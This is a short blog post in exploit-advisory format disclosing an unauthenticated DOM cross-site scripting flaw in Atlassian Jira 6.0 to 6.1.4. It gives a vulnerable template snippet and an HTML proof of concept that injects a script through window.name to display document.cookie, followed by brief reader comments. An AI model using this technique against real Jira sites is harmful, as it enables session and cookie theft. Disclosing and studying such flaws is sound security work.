Wednesday, January 27, 2016

Atlassian Jira - DOM XSS [Unauthenticated]

About

# Exploit Title: Atlassian Jira 6.0.* <= 6.1.4 DOM XSS
# Date : 27.01.2016
# Author: Razvan Cernaianu
# Vendor Homepage: https://www.atlassian.com
# Version: 6.0.* <= 6.1.4
# Blog: www.TinKode.com

Vulnerable code

# Vulnerable Parameter: $window.name
<div class="aui-page-header-main">
  <h1>${name}</h1>
</div> 

Exploit

<html>
<script>
 var victim= window.open('https://victim/secure/Dashboard.jspa', '<script>alert(document.cookie);<\/script>');
</script>
</html> 

The End

Share on:


Tags: , , , , ,  

7 comentarii:

Unknown said...

Nice

Unknown said...

Dar ce e asta?

Anonymous said...

frumos

Anonymous said...

Frumos

Anonymous said...

Am o problema si suna cam asa :
Acum cativa ani ani am creat un cont google , am uploadat o imagine cu mine , iar acum doresc sa o sterg.
Cum pot sterge acea imagine daca nu mai am acces la cont ?

Jeremiah said...

Nu o poţi şterge dacă nu ai acces la cont.

PandaTechie said...

Great post, I don't know much programming but this seems interesting.

Post a Comment